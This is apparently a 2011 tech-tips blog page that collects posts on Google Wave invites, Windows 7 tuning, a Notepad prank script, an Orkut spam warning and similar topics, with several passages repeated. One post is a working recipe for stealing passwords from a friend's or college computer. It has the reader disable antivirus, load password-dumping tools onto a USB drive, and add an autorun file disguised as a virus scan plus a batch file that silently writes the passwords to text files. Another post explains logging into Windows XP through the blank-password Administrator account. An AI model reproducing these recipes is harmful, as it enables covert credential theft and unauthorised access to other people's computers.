Wednesday, May 11, 2011
Wednesday, May 4, 2011
How to Invite others for Google Wave!!
While I was discussing with friends on Twitter, realize many people who have Wave account are still not aware of how to send Wave invitation.
This is a simple screenshot and guide which will help you to Invite others on Google wave.
Once you sign up for Google wave, under Inbox you will see, Invite others to Google Wave. Once you click on it, you can simply add Email address of your friends to invite.
You have total 8 invites, so use it wisely and invites those who can be online most of the time.
On the Right panel you need to Enter Email address of your friends whom you want to invite.
Keep in mind, that invitation are not sent at the same time. It will take few hours or a day to receive. So ask your friends to be patient.
According to Google Wave :
Invitations will not be sent immediately. We have a lot of stamps to lick.
I’m sure you going to have good time With Google Wave. If you have Google wave account, you can join me at muneermohammed6[at]googlewave.com.
Tuesday, May 3, 2011
How To Make Notepad Write On Its Own
A Notepad
that writes on it own is for sure a very weird thing but very funny in the same time. And if you change the icon
of the file you create with the Notepad's, and replace the Notepad icon from your friend's computer with this file for sure you will create a great prank.
1. Open Notepad.
2. Copy this script in Notepad:
that writes on it own is for sure a very weird thing but very funny in the same time. And if you change the icon
of the file you create with the Notepad's, and replace the Notepad icon from your friend's computer with this file for sure you will create a great prank.
1. Open Notepad.
2. Copy this script in Notepad:
PHP Code:
set wshshell = wscript.CreateObject("wscript.shell")wshshell.run "Notepad"wscript.sleep 2000
wshshell.AppActivate "Notepad"WshShell.SendKeys "H"WScript.Sleep 500
WshShell.SendKeys "ell"WScript.Sleep 500
WshShell.SendKeys "o "
You can add more lines like the following ones for more letters:
WScript.Sleep 500
WshShell.SendKeys "insert here your letter of group of letters "
3. Now save the file. Go to File->Save as. Type the name of the file with the extension .vbs. For example if you want to choose the name Notepad, type Notepad.vbs. Also be sure that File type is All files not Text file!
4. When you doubleclick on it, Notepad will start typing letters.
How to Optimise Windows 7
Tweaks to improve your new OS
Microsoft's new operating system, Windows 7, offers significant improvement over Vista. But if you want to get the very best performance possible, you should make a few system tweaks to eliminate resource-hogging programs and features.
In this guide, I'll show you a few good ways to boost your PC's performance without upgrading your hardware.
First, one warning: A quick internet search will lead you to treasure troves of advice for making the most of your OS, but beware - many of those suggestions are fool's gold, myths inherited from Vista and XP optimisation guides that could actually do more harm than good for your Windows 7 system's performance.
The tweaks and suggestions I offer here won't transform your rusty old junker into a screaming new Porsche, but they will help you squeeze some extra speed and space out of your native Windows 7 installation.
Is my PC Windows 7 compatible?
If you intend to perform additional modifications to Windows 7 beyond the options I describe here, be sure to run a quick search for ‘Windows 7 performance myths'.
Don't be fooled by the more outlandish tweaking claims and tutorials you'll find on the internet. Investigate the changes you intend to make to your system before you do anything, or you might find yourself in an undesirable (or even irreparable) situation.
Speed up a fresh Windows 7 upgrade
When you reach the first, fresh desktop after completing a successful Windows 7 installation, you might be stunned to find your components in perfect working order.
For the most part Windows 7 is quite good about setting up drivers for networking, video, input devices, and other elements - good, that is, but not great.
To maximise your PC's performance, first hunt down and install Windows 7 drivers for all of the critical components attached to your system.
Motherboard drivers are the most important consideration, especially if your system's video and sound are integrated onto the system board.
If those components aren't integrated in your PC, add drivers for your video card and sound card to the list, followed by your input devices and any additional parts you've attached to your system in some capacity (including, but not limited to, a Wi-Fi card, any PCI-based devices, and printers).
If you're not sure what components you have, grab the free program DriverMax and use it to scan your system for components and for potential driver updates.
Can't find Windows 7 drivers for a product? Try using Windows Vista drivers instead.
If you run into trouble, try right-clicking on the executable file and left-clicking Troubleshoot Compatibility. Run through the wizard and select the option that refers to the program's running fine in an earlier version of Windows but not in Windows 7.
Select Windows Vista as the subsequent operating system, click Next through the offered prompts, and then run the installation executable again.
Finally, though it might sound odd, don't use the Windows Updater to install drivers for your machine - Microsoft is notorious for releasing old and/or incompatible drivers through this service.
Windows 7 may be faster than Vista but these tweaks will speed up the OS even further without the need to upgrade your hardware.
Optimise your storage
If you installed Windows 7 as an upgrade from Windows Vista, you'll find a folder labeled C:\Windows.old. This folder, as you might expect, holds the full contents of your old Windows Vista system. It's huge, and it's a waste of space.
Scroll through the folders for any files that you want to save in your new Windows 7 OS, and then delete the entire folder from your drive. Space saved.
If your PC has multiple hard drives, you can boost performance by moving the location of the system's paging file from the drive containing the C:\ partition to a separate hard drive.
To do that, open Control Panel and choose System. From there, click Advanced System Settings. Select the Advanced tab, and then click the Settings button under the Performance category. On the new window that pops up, choose the Advanced tab.
Finally, click Change. Uncheck the box labeled Automatically manage paging file size for all drives. Select C: from the Drive box and switch it to the No paging file option. Next, select a different hard drive and choose System managed size. Click OK and restart your computer.
Pushing your performance
To create a faster Windows 7 experience, start by modifying the amount of time that mouse-over boxes and clicked menus take to appear. Click on the Windows Start button and type regedit into the 'Search programs and files' box.
Welcome to the Windows 7 Registry - don't touch or modify anything without good reason. Left-click on the expandable arrow next to HKEY_CURRENT_USER. Expand the Control Panel folder, and then click directly on Desktop in the hierarchy. In the right pane, look for and double-click MenuShowDelay.
Change the value from 400 to any lesser number that's one or greater; this figure represents the milliseconds of delay between your click and a menu's display. Restart the computer to apply the changes immediately, or continue to the next tweak.
See the folder labeled Mouse (below Desktop). Click that, and then search for and select the MouseHoverTime Registry key. Just as before, change this value to any lesser number that's one or greater. Close the Registry Editor, restart the computer, and you'll have faster mouseovers.
If you're willing to sacrifice looks for speed, you can modify the visual settings of the Windows 7 interface to emphasise performance over presentation.
Go back to the System section of Control Panel and click on Advanced System Settings again. On the System Properties window that appears, choose the Advanced tab and then click on the Settings box underneath the Performance category.
The Performance Options window will pop up. There, you'll see a list of checked boxes that correspond to all of the window dressing in the operating system.
If you don't mind transforming your OS into a clone of Windows 2000, click the button that tells Windows to adjust its visual settings for best performance. It's a harsh step to take, though - if you'd prefer a piecemeal approach, uncheck only the boxes that relate to Windows Aero (such as Aero peek and transparent glass). You'll retain a semblance of a pretty desktop while still improving performance a teeny bit.
Conserve resources
Once you've installed a fair amount of programs on your PC - your ‘core base' of apps, as it were - you'll want to check that your system doesn't have any unwanted applications running in the background that could otherwise impede the machine's general performance.
These programs launch themselves during the operating system's startup process, and are often designed to help you load their corresponding applications faster. The problem is that they run every time, regardless of whether you intend to use the application during a given session.
Click Start and type msconfig into the 'Search programs and files' field. Press Enter. In the System Configuration window that appears, select the Startup tab. Move your mouse between the headers of the Manufacturer and Command columns, and shrink the Manufacturer column down; the Command column is the one you care about.
A number of the startup applications that launch on your machine sit in the background, consuming resources.
For example, take iTunes: If you've installed this application, you'll find iTunes and QuickTime listings in the Startup tab. Both iTunesHelper.exe and QTTask.exe are unnecessary additions to your system - the former launches when you start iTunes anyway, and the latter places a QuickTime icon in the corner of your system for easy program launching. Uncheck them both.
As for the other programs on your list, try running a quick web search of each application's executable-file name to find out if the program is worth keeping or removing. Once you've checked the programs you want to launch at startup and unchecked the programs you don't, click OK.
In addition to startup programs, you'll find services on your PC; Microsoft recommends trimming both to squeeze the most performance out of your system. For the services, click Start, type services.msc into the search field, and press Enter.
Up pops the Services window, a list of options and executables that's even more confusing than the startup window.
You can't identify which services to turn off (and which to leave on) without taking a close look at how each one affects your system's overall performance.
Thankfully, someone has been doing that exact task since Windows XP: Charles Sparks, under the alias Black Viper, has listed every single permutation of Windows 7's servicesacross all of its versions, along with a 'safe' and ‘tweaked' list of which services you should modify and how you should set their parameters.
To follow his advice, just double-click on any listed service. You need concern yourself only with the 'Startup type' listing in the screen that appears next. By switching among the Automatic, Manual, and Disabled modes, depending on his recommendations, you'll be able to control exactly how services launch - if at all - during the Windows startup process and during your general use of the operating system. Every little bit helps.
Maintain top performance
If you want to keep your system fast, be sure to clear out your C:\Windows\Temp folder on occasion. Do it as soon as you boot into the OS, or even through Safe Mode, to ensure that you wipe every last unused file from your drive.
In the same vein, don't use Windows 7's uninstall function or a program's default uninstall executable to remove the application from your drive. Instead, use the free Revo Uninstaller utility; this awesome application removes programs using their default uninstall routines, but it also goes one step further by scanning your system and Registry to clean away any and all traces of the program from your hard drive.
Tweaking the operating system to increase its performance helps you achieve better results with the equipment you have, but the surest way to boost your PC's prowess is to upgrade the hardware. Once you've done that, remember to keep your system free from clutter - what good is a performance boost on a messy system anyhow?
THIS IS NOT FOR BEGINNERS One should know what they are doing..
Hack using your USB/Flash Drive
Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Download from here..:-
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Download from here..:-
Code:
http://www.nirsoft.net/utils/mspass.html
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
Download from here:-
Code:
http://www.nirsoft.net/utils/mailpv.html
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Download from here:-
Code:
http://www.nirsoft.net/utils/internet_explorer_password.html
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
Download from here:-
Code:
http://www.nirsoft.net/utils/pspv.html
Download from here:-
Code:
http://www.nirsoft.net/utils/passwordfox.html
Here is a step by step procedure to create the password hacking toolkit:
NOTE: You must temporarily disable your anti virus before following these steps.
1. Download all the 5 tools, extract them and copy only the executable(.exe files) into your USB Pen-drive.
i.e: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it:
Code:
Quote:
[autorun] open=launch.bat ACTION= Perform a Virus Scan |
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
Code:
Quote:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt |
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
You Wanna Know Who Used &Your PC in Your Absence
Who Used Your Pc In Your Absence,what Did He Do?
first you should go
"start > run >eventvwr.msc"
Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.
first you should go
"start > run >eventvwr.msc"
Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.
New Spams in orkut - Beware!!
1> FREE MOBILE RECHARGE
2> SCRIPT FOR NEW THEMES
3> WATCH PORN VIDEO ON ORKUT
have started in orkut..
It makes u;
2> SCRIPT FOR NEW THEMES
3> WATCH PORN VIDEO ON ORKUT
have started in orkut..
It makes u;
- Join Some Communities which they desire!
- Posts about the Script in some random Communities!
- Scraps about the Script to your friends!
- Changes your About Me,Status Msg of your orkut profile!
- Sends some testimonials about the script to some of your friends!
- It also Sends a Comment to your friend's random picture and about the spam in it.
- Can hack your profile by using fake page of orkut at the end.
So please make sure dat u dont fell for any such trick!
you'll be asked to use a javascript ..
No matter what it claims to do, never use any scripts..
else your account will be misused and also hacked!
Stay safe!
Google Safe Browsing
http://www.google.com/tools/fire
What to do If Incase I accidentally entered my information in to a fake site?
If you still had access to your account, change your password immediately and try editing your settings back to normal.
Changing Password:Google account help
http://www.google.com/support/orkut/
https://www.google.com/accounts/
Click the link below to edit your account settings
https://www.google.com/accounts/
Incase you lost access to your profile then try clicking forgot password option
http://www.google.com/support/orku
In
https://www.google.com/support/accounts/
If the post was helpful to you, please comment about it ;)
Hack Windows Xp Administrators Password! - the Noob Way!
If have forgotten your user account password then try the method listed below to get inside your pc!
Start system and when you see Windows Welcome screen / Login screen, press Ctrl + Alt + Dlt keys twice and it'll show Classic Login box. Now type "Administrator" (without quotes) in Username and leave Password field blank. Now press Enter and you should be able to log in Windows.
Now you can reset your account password from "Control Panel -> User Accounts".
Same thing can be done using Safe Mode. In Safe Mode Windows will show this in-built Administrator account in Login screen.
Works in Windows Xp!
this might work .. maynot work also! :P
Start system and when you see Windows Welcome screen / Login screen, press Ctrl + Alt + Dlt keys twice and it'll show Classic Login box. Now type "Administrator" (without quotes) in Username and leave Password field blank. Now press Enter and you should be able to log in Windows.
Now you can reset your account password from "Control Panel -> User Accounts".
Same thing can be done using Safe Mode. In Safe Mode Windows will show this in-built Administrator account in Login screen.
Works in Windows Xp!
this might work .. maynot work also! :P
Shutdown Your PC In 3 Seconds!
Shutting Down a PC will take Sometime..
But Sometime if we've Opened Lots of stuffs, it can get freezed.
If you Want to Shut down you Pc in About 3 Seconds..
Click Ctrl + Alt + Delete (Task Manager will open)
Go to Shutdown in the menu bar!
Then, Hold On Ctrl And Click Turn Off for about 3 Seconds.
Then your PC will be Shutted Down in a Sec ;)
I Advice you not to use it everytime as it may Cause loss of Some Data (Maybe)
Anyways, Its usefull when we are in a hurry ;)
Note: This Process maynot Work In Windows Vista but will surely work in Windows XP
But Sometime if we've Opened Lots of stuffs, it can get freezed.
If you Want to Shut down you Pc in About 3 Seconds..
Click Ctrl + Alt + Delete (Task Manager will open)
Go to Shutdown in the menu bar!
Then, Hold On Ctrl And Click Turn Off for about 3 Seconds.
Then your PC will be Shutted Down in a Sec ;)
I Advice you not to use it everytime as it may Cause loss of Some Data (Maybe)
Anyways, Its usefull when we are in a hurry ;)
Note: This Process maynot Work In Windows Vista but will surely work in Windows XP
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